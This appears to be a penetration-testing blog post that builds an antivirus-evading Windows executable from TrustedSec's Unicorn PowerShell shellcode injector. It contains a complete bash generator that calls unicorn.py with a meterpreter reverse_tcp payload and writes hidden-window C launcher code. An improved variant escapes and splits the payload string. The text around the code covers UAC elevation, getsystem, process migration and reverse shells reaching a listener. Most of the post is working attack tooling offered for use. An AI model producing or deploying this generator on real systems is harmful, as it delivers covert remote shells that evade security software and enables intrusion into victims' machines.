There is an excellent Python script made available by David Kennedy called Unicorn: a simple Python script that performs a PowerShell downgrade attack and injects shellcode straight into memory. The project page is here:
https://github.com/trustedsec/unicorn
Direct download is here:
https://github.com/trustedsec/unicorn/raw/master/unicorn.py
Usage is pretty simple: download the Python script, save it to your Metasploit root directory and execute it; the resulting ASCII output can be fed directly to PowerShell on the target.
I have created a little generator that produces compilable C code out of this, so you can build a nice Win32 PE executable which will get you past most modern AVs (tested against Kaspersky, MS Essentials, ESET ...). It will only work on Windows 7 and 8, 32/64-bit. I have tried it on XP with PowerShell installed but could not get it to run.
So here is the source for the Unicorn2c generator:
#!/bin/bash
clear
echo '--------------------------------------'
echo ' Unicorn Powershell2C code generator '
echo 'Works for Vista, Win7, Win8 32/64 bit'
echo '--------------------------------------'

usage() {
    echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform'
    echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
    echo 'Valid platforms are: nonuac uac'
    exit 0
}

[ $# -ne 4 ] && usage

# The two variants differ only in the ShellExecute verb: NULL starts
# powershell.exe at the caller's own integrity level, "runas" asks for
# elevation (UAC prompt when the caller is not already elevated).
case $4 in
    nonuac) echo 'Generating nonUAC unicorn.c ...'; verb='NULL' ;;
    uac)    echo 'Generating UAC unicorn.c ...';    verb='"runas"' ;;
    *)      usage ;;
esac

# unicorn.py must sit next to this script and needs msfvenom, hence the
# Metasploit root directory; it writes the one-liner to powershell_attack.txt.
python unicorn.py "$1" "$2" "$3" || exit 1
[ -f powershell_attack.txt ] || { echo 'powershell_attack.txt not found'; exit 1; }

# Strip the leading "powershell " (11 characters) so that only the arguments
# are passed to ShellExecute. The one-liner is pasted into a C string literal
# as-is, so it must not contain unescaped double quotes or backslashes.
args=$(sed -r 's/^.{11}//' powershell_attack.txt)

# windows.h has to come before shlobj.h/aclapi.h.
cat > unicorn.c <<EOF
#include <windows.h>
#include <shlobj.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "shell32.lib")

int main(int argc, char *argv[])
{
    FreeConsole();
    ShellExecute(NULL, $verb, "powershell.exe", "$args", NULL, SW_HIDE);
    return 0;
}
EOF

# Convert to CRLF line endings (todos comes with the tofrodos package).
todos unicorn.c
echo '[*] Exported unicorn.c  To compile use cl.exe unicorn.c'
Save this as an executable shell script in your Metasploit root directory and make sure the original unicorn.py sits next to it. Usage is simple: run the shell script with the required options. The fourth argument is the platform, either nonuac or uac. The resulting C code differs only in the verb passed to ShellExecute: "runas" (for UAC) or NULL (for non-UAC).
If, for example, the UAC-compiled binary is executed from an elevated command prompt, ShellExecute starts PowerShell with the same privileges, which lets us run getsystem and migrate into any process. But if a non-privileged user runs the UAC binary, the "runas" verb triggers a UAC prompt (a credential prompt for a standard user, a consent prompt for an administrator running with a filtered token), which is hard to miss. That is why there is an option to generate the non-UAC variant; from that one we won't be able to getsystem or migrate into processes other than our own user's.
Compilation is easy: use Visual Studio C++ 2010 or 2012 (Express or full) and, from the Visual Studio Tools command prompt, compile for 32-bit! A 32-bit build also means that on 64-bit Windows the WOW64 file-system redirection resolves powershell.exe to the 32-bit PowerShell under SysWOW64, which is what Unicorn's 32-bit shellcode expects. Like so:
cl.exe unicorn.c
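As an added example (not part of the original post or of the Unicorn project), here is a version of the C generation step that does not assume the one-liner in powershell_attack.txt is free of double quotes and backslashes, and that stays below MSVC's limit on a single string literal (error C2026 at 16380 characters) by splitting the argument string into adjacent literals that the compiler concatenates. The function names ps2cstring and gen_wrapper, the constructed sample one-liner and the chunk size of 1000 characters are my choices, not Unicorn's:

```shell
#!/bin/sh
# Added example: turn the one-liner Unicorn writes to powershell_attack.txt
# into the ShellExecute() parameter string as C literal(s).
# Assumptions (not from the original page): the one-liner starts with the
# token "powershell ", may contain double quotes and backslashes, and MSVC
# is the compiler, so one string literal must stay under 16380 characters
# (error C2026); adjacent literals are concatenated by the compiler.

# ps2cstring ONELINER
#   prints the argument part of ONELINER as C string literal(s), one
#   chunk of at most 1000 characters per line, quotes and backslashes
#   escaped. Chunking happens before escaping so that no escape
#   sequence is split across two literals.
ps2cstring() {
    printf '%s' "$1" \
      | sed -e 's/^powershell //' \
      | fold -w 1000 \
      | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g' -e 's/^/"/' -e 's/$/"/'
}

# gen_wrapper ONELINER PLATFORM > unicorn.c
#   PLATFORM is "uac" (verb "runas": asks for elevation, prompts when the
#   caller is not already elevated) or anything else (verb NULL: same
#   integrity level as the caller). SW_HIDE is 0, the same value the
#   original passes as NULL for nShowCmd.
gen_wrapper() {
    if [ "$2" = uac ]; then verb='"runas"'; else verb=NULL; fi
    cat <<EOF
#include <windows.h>
#include <shellapi.h>
#pragma comment(lib, "shell32.lib")

int main(void)
{
    FreeConsole();
    ShellExecuteA(NULL, $verb, "powershell.exe",
$(ps2cstring "$1" | sed 's/^/        /'),
        NULL, SW_HIDE);
    return 0;
}
EOF
}

# Constructed sample one-liner (not real Unicorn output) for the demo; the
# "$a" is passed through untouched because expansion results are not
# re-expanded inside the heredoc.
SAMPLE='powershell /w 1 /C "sv a (gc x);IEX $a"'
gen_wrapper "$SAMPLE" uac
```

In the generator, `gen_wrapper "$(cat powershell_attack.txt)" "$4" > unicorn.c` replaces the echo chain, and `todos unicorn.c` / `cl.exe unicorn.c` stay as before. Before shipping, check the total length of the argument string: CreateProcess, which ShellExecute ends up calling, rejects command lines longer than 32767 characters, so a very large encoded payload has to be delivered differently.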
Sometimes the binary takes a while to spawn a reverse shell on the listener, but this may be because my system is virtual and has low memory resources.